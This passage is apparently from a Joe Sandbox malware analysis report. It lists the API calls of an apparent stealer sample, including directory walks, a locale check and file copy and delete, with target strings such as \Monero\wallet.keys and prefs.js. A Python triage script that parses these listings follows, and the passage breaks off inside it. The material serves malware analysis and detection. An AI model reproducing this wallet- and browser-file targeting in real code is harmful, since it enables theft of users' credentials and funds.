                          • wsprintfA.USER32 ref: 00AF3EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00AF3EDA
                          • StrCmpCA.SHLWAPI(?,00B00FAC), ref: 00AF3F08
                          • StrCmpCA.SHLWAPI(?,00B00FB0), ref: 00AF3F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AF406C
                          • FindClose.KERNEL32(000000FF), ref: 00AF4081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: f9c61bf9c73b9745237f18e96457165959529ad1f373b3fcf8fee59db15535a8
                          • Instruction ID: b8ddc2988e3256d05fd2c847738dd0924e165f61f3154986c05575f67da0b60d
                          • Opcode Fuzzy Hash: f9c61bf9c73b9745237f18e96457165959529ad1f373b3fcf8fee59db15535a8
                          • Instruction Fuzzy Hash: 0F5143B6900218ABCB24FBB4DD85EFA737CFB58300F004588B75996140DB75EB868FA1
                          APIs
                          • wsprintfA.USER32 ref: 00AEED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 00AEED55
                          • StrCmpCA.SHLWAPI(?,00B01538), ref: 00AEEDAB
                          • StrCmpCA.SHLWAPI(?,00B0153C), ref: 00AEEDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AEF2AE
                          • FindClose.KERNEL32(000000FF), ref: 00AEF2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: 67c5846eaae785a8f1046b98734469095261941b6d55e74a01eb6952653e3c65
                          • Instruction ID: 749aac0d66bf4063c71fe8cb2ed62be27e9afe259ba18a4760eb2a4d736956e2
                          • Opcode Fuzzy Hash: 67c5846eaae785a8f1046b98734469095261941b6d55e74a01eb6952653e3c65
                          • Instruction Fuzzy Hash: ABE1E4B191111C9ADB54FBA4CD91EFE7378AF64340F4045E9B60E62092EE706F8ACF91
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B015B8,00B00D96), ref: 00AEF71E
                          • StrCmpCA.SHLWAPI(?,00B015BC), ref: 00AEF76F
                          • StrCmpCA.SHLWAPI(?,00B015C0), ref: 00AEF785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AEFAB1
                          • FindClose.KERNEL32(000000FF), ref: 00AEFAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: 02a2e20cf40ff07aa1e9980c094a9e8246da023ddd67b69aa4d3ef8cb47a6780
                          • Instruction ID: ee4d4efe008f9746bf08a5ad09d7e5f4224ed4c04f11cc2defcd3dfd539dd73f
                          • Opcode Fuzzy Hash: 02a2e20cf40ff07aa1e9980c094a9e8246da023ddd67b69aa4d3ef8cb47a6780
                          • Instruction Fuzzy Hash: 38B141B19002189BCB24FFA4DD95EFE7379AF64340F4085A8B50E97191EF706B49CB92
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B0510C,?,?,?,00B051B4,?,?,00000000,?,00000000), ref: 00AE1923
                          • StrCmpCA.SHLWAPI(?,00B0525C), ref: 00AE1973
                          • StrCmpCA.SHLWAPI(?,00B05304), ref: 00AE1989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AE1D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00AE1DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AE1E20
                          • FindClose.KERNEL32(000000FF), ref: 00AE1E32
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: 1e2ea6560f8bde040b3ed7448bde760713a2e48aa98d5c43e03da8440735878d
                          • Instruction ID: d2b2de6ab0a42147935106fb5cd1fbc5acfc9ecf6501eaae28529ad3ff91cad9
                          • Opcode Fuzzy Hash: 1e2ea6560f8bde040b3ed7448bde760713a2e48aa98d5c43e03da8440735878d
                          • Instruction Fuzzy Hash: 7112CFB191011C9BDB15FBA0DD96EFE7378AF64340F4045A9B60A62091EF706F89CFA1
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00B00C2E), ref: 00AEDE5E
                          • StrCmpCA.SHLWAPI(?,00B014C8), ref: 00AEDEAE
                          • StrCmpCA.SHLWAPI(?,00B014CC), ref: 00AEDEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AEE3E0
                          • FindClose.KERNEL32(000000FF), ref: 00AEE3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: 30ee5dfb8008c6b5af310db9016dba408296a58f97cfd96f8fd321070a5a803f
                          • Instruction ID: 579d96577dc36baf7aeab8c0649ee1a20cd8dbbfe38f2fc49c58cb2a1d770251
                          • Opcode Fuzzy Hash: 30ee5dfb8008c6b5af310db9016dba408296a58f97cfd96f8fd321070a5a803f
                          • Instruction Fuzzy Hash: B5F19FB191411D9ADB25FBA0CD95EFE7378AF24340F4045E9B50E62091EF706B4ACFA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: -zou$=J}$Ay?}$Rn$V~$^mx[$dz[_$f{$6$v/u$x]
                          • API String ID: 0-3884187865
                          • Opcode ID: 4cd21799ae7f21d4ec6d17c61336a5384133b470b00685d3bfdfc0f6b0291b58
                          • Instruction ID: df01bcef4dd8345941a99c54816e9608248bac2d919eab5c5b7a193602905b98
                          • Opcode Fuzzy Hash: 4cd21799ae7f21d4ec6d17c61336a5384133b470b00685d3bfdfc0f6b0291b58
                          • Instruction Fuzzy Hash: DCB217F3A082049FE3046E2DEC8567AFBE9EBD4720F1A463DEAC4C3744E97558058697
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B014B0,00B00C2A), ref: 00AEDAEB
                          • StrCmpCA.SHLWAPI(?,00B014B4), ref: 00AEDB33
                          • StrCmpCA.SHLWAPI(?,00B014B8), ref: 00AEDB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AEDDCC
                          • FindClose.KERNEL32(000000FF), ref: 00AEDDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 7a77aaa0fe0c0b11b9d608272d7ce4150fd335e6d7de035fc3f0cc75020e055d
                          • Instruction ID: 3dda9744f5615e8518ce99a7d8d06576f3626926de5535330373700bbcfa890a
                          • Opcode Fuzzy Hash: 7a77aaa0fe0c0b11b9d608272d7ce4150fd335e6d7de035fc3f0cc75020e055d
                          • Instruction Fuzzy Hash: 549157B290020897CB14FBB4DD96DFD737DAB94340F408568F90AD6195EE74AB09CBA2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #N$M$)!7~$,x?}$6z3e$;<P$Ajy$[y_s$bNWi
                          • API String ID: 0-3561138217
                          • Opcode ID: 97b2ffa6e63cc06b275a7b1afcaeffffebccf75a03d59258bfc4c53d850c7738
                          • Instruction ID: 502f232c9a3ce4d31660bba7147d74aef4197fa83dc9ca4d0d7a2bc51a06c6f4
                          • Opcode Fuzzy Hash: 97b2ffa6e63cc06b275a7b1afcaeffffebccf75a03d59258bfc4c53d850c7738
                          • Instruction Fuzzy Hash: FCB217F390C204AFE314AE2DEC8577ABBE5EF94320F1A493DE6C4D7744E63598018696
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,00B005AF), ref: 00AF7BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00AF7BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00AF7C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00AF7C62
                          • LocalFree.KERNEL32(00000000), ref: 00AF7D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 078d3240fc8422bbd3ca3a8d70a7b6a0aafc6d6cc5b4d1634793c50f66afa9be
                          • Instruction ID: 84a637c15bdcd5fff40d0299089710f95f569d393a867cf6d469703522a0f3c6
                          • Opcode Fuzzy Hash: 078d3240fc8422bbd3ca3a8d70a7b6a0aafc6d6cc5b4d1634793c50f66afa9be
                          • Instruction Fuzzy Hash: C3413CB194021CABDB24DB94DD99BFEB374FB54700F204199F209A2290DB742F86CFA1
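The API listings on this page follow a few recognisable shapes: a directory walk built from FindFirstFileA, two StrCmpCA calls (the "." and ".." skip), FindNextFileA and FindClose, sometimes with CopyFileA and DeleteFileA inside the loop; the GetKeyboardLayoutList / GetLocaleInfoA pair above that fits the locale check; and, further down, CryptStringToBinaryA followed by lstrcat. The script below is an added example written for this page; it is not part of the Joe Sandbox report and not the sample's own code. It parses the "APIs" bullets in exactly the form rendered here, keeps only the calls a function makes directly (the "Part of subcall function" lines are inherited from helpers such as 00AFA9B0 and would otherwise tag every caller of that helper), matches the direct call set against four behaviour rules whose names (directory_walk, file_grab, locale_check, base64_decode) are the editor's own labels rather than report signatures, and pulls out literal string arguments such as \Monero\wallet.keys. The embedded sample is copied from three of the listings on this page.

```python
r"""Triage helper for Joe Sandbox per-function API listings.

The report renders each analysed function as an 'APIs' bullet list. This
script parses those bullets, separates direct calls from the ones the report
inherits from subcalls ('Part of subcall function ...'), matches the direct
call set against a few behaviour rules and pulls out literal string arguments
such as \Monero\wallet.keys. Rule names are this example's own labels.
"""
import re
from dataclasses import dataclass
from typing import Optional

# One bullet of an 'APIs' list, e.g.
#   • FindFirstFileA.KERNEL32(00000000,?,...), ref: 00AE1923
#   • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,...), ref: 00AFA9C5
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX_RE = re.compile(r"^[0-9A-F]{8}$")  # pointer / integer argument as rendered

# Behaviour rules: every API in the set must be called directly by the function.
RULES = [
    ("directory_walk", {"FindFirstFileA", "FindNextFileA"}),
    ("file_grab", {"FindFirstFileA", "CopyFileA"}),
    ("locale_check", {"GetKeyboardLayoutList", "GetLocaleInfoA"}),
    ("base64_decode", {"CryptStringToBinaryA"}),
]


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str                 # address of the call site
    subcall: Optional[str]   # callee address when inherited from a subcall


def parse_api_lines(text: str) -> list:
    """Parse every API bullet in `text`, in report order."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = m.group("args").split(",") if m.group("args") else []
            calls.append(ApiCall(m.group("api"), m.group("module"), args,
                                 m.group("ref"), m.group("sub")))
    return calls


def split_api_blocks(text: str) -> list:
    """Return the text of each 'APIs' section (one per analysed function)."""
    blocks, current = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            current = []
        elif s in ("Strings", "Memory Dump Source"):
            if current:
                blocks.append("\n".join(current))
            current = None
        elif current is not None:
            current.append(line)
    if current:
        blocks.append("\n".join(current))
    return blocks


def classify(calls: list) -> list:
    """Names of RULES whose API set is fully covered by the direct calls."""
    direct = {c.api for c in calls if c.subcall is None}
    return [name for name, needed in RULES if needed <= direct]


def string_args(calls: list) -> list:
    """Arguments that are neither pointers nor '?' placeholders: literal strings."""
    out = []
    for c in calls:
        for a in c.args:
            if a and a != "?" and not HEX_RE.match(a) and a not in out:
                out.append(a)
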